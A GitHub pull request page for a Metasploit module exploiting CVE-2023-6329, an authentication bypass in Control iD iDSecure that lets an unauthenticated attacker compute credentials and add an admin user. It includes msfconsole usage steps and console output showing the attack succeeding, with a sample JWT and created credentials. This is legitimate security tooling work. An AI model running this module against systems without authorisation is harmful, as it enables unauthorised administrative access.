Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module #19380

Merged
merged 4 commits into from
Aug 26, 2024
Merged

Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module #19380

merged 4 commits into from
Aug 26, 2024

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented Aug 11, 2024

This is a new module which exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.

Verification Steps

  1. Download the application from the vendor.
  2. Deploy it by following the vendor's documentation.
  3. Start msfconsole
  4. use auxiliary/admin/http/idsecure_auth_bypass
  5. set RHOSTS <IP>
  6. run

A new administrative user should have been added to the web interface of the product.

msf6 > use auxiliary/admin/http/idsecure_auth_bypass
msf6 auxiliary(admin/http/idsecure_auth_bypass) > set RHOSTS 192.168.137.196
[*] Running module against 192.168.137.196

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 4.7.43.0
[+] The target appears to be vulnerable.
[+] Retrieved passwordRandom: <redacted>
[+] Retrieved serial: <redacted>
[*] Created passwordCustom: <redacted>
[+] Retrieved JWT accessToken: <redacted>
[+] New user 'h4x0r:Sup3rS3cr3t!' was successfully added.
[+] Login at: https://192.168.137.196:30443/#/login
[*] Auxiliary module execution completed

Successfully tested on

  • Control iD iDSecure v4.7.43.0 on Windows 10 22H2
  • Control iD iDSecure v4.7.32.0 on Windows 10 22H2

@h4x-x0r
Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
5fa18a6 
Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
h4x-x0r added 2 commits August 13, 2024 23:12
@h4x-x0r
Code cleanup and added store_valid_credential
c53e5d3 
added store_valid_credential
code cleanup
@h4x-x0r
code cleanup
17149db 
code cleanup
@h4x-x0r h4x-x0r marked this pull request as draft August 19, 2024 15:41
@h4x-x0r
code cleanup
3f3690b 
code cleanup
@h4x-x0r h4x-x0r marked this pull request as ready for review August 19, 2024 20:21
@bwatters-r7 bwatters-r7 self-assigned this Aug 23, 2024
@bwatters-r7
Copy link
Contributor 

msf6 auxiliary(admin/http/idsecure_auth_bypass) > show options

Module options (auxiliary/admin/http/idsecure_auth_bypass):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   NEW_PASSWORD  6FnMHvrCm3Gr     yes       Password for the specified user
   NEW_USER      s8BFpy6b         yes       The new administrative user to add to the system
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         30443            yes       The target port (TCP)
   SSL           True             no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/idsecure_auth_bypass) > set rhost 10.5.134.118
rhost => 10.5.134.118
msf6 auxiliary(admin/http/idsecure_auth_bypass) > run
[*] Running module against 10.5.134.118

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Got version: 4.7.43.0
[+] The target appears to be vulnerable.
[+] Retrieved passwordRandom: 2993036889
[+] Retrieved serial: GAD27523A4
[*] Created passwordCustom: 13441929
[+] Retrieved JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjaWRVc2VyVHlwZSI6IjEiLCJjaWRVc2VyTmFtZSI6IkFkbWluaXN0cmFkb3IiLCJjaWRVc2VySWQiOiIxIiwiaXNzIjoiR2VyZW5jaWFkb3IgaURBY2Nlc3MiLCJleHAiOjE3MjQ3OTk2OTksIm5iZiI6MTcyNDcxMzI5OX0.KSI_2XxFdYV0hBo6LogwvKeNnfL9d-q3u9B2vJQ9niQ
[+] New user 's8BFpy6b:6FnMHvrCm3Gr' was successfully added.
[+] Login at: https://10.5.134.118:30443/#/login
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/idsecure_auth_bypass) >

@bwatters-r7 bwatters-r7 merged commit 84431b0 into rapid7:master Aug 26, 2024
39 checks passed
@bwatters-r7
Copy link
Contributor

Release Notes

Adds an auxiliary module targeting CVE-2023-6329, an improper access control vulnerability, which allows an unauthenticated user to compute valid credentials and to add a new administrative user to the web interface of Control iD iDSecure <= v4.7.43.0.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 26, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@dwelch-r7 dwelch-r7 dwelch-r7 left review comments

@jvoisin jvoisin jvoisin left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@h4x-x0r @bwatters-r7 @jvoisin @dwelch-r7